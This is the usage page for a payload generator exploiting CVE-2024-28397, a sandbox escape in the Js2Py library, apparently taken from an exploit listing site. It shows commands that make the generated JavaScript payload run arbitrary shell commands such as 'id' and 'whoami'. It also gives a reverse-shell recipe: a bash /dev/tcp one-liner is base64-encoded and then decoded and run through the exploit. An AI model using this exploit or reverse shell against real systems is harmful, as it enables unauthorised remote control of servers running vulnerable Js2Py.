Share
## https://sploitus.com/exploit?id=E948C956-ACE1-5431-8E31-16EDEA132F5A
# CVE-2024-28397 - Js2Py Sandbox Escape Payload Generator

This script generates a JavaScript payload that can be evaluated by Js2Py in vulnerable environments where Python internals are exposed through object wrappers.


## Usage

Basic command execution:

```bash
python3 cve-2024-28397.py -c "id"
```

Generate a compact one-line payload:

```bash
python3 cve-2024-28397.py -c "whoami" --compact
```

## Reverse Shell with Base64

Generate the Base64 payload:

```bash
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
```

Generate the Js2Py payload:

```bash
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
```

Replace `BASE64_OUTPUT` with the Base64 string generated in the first step.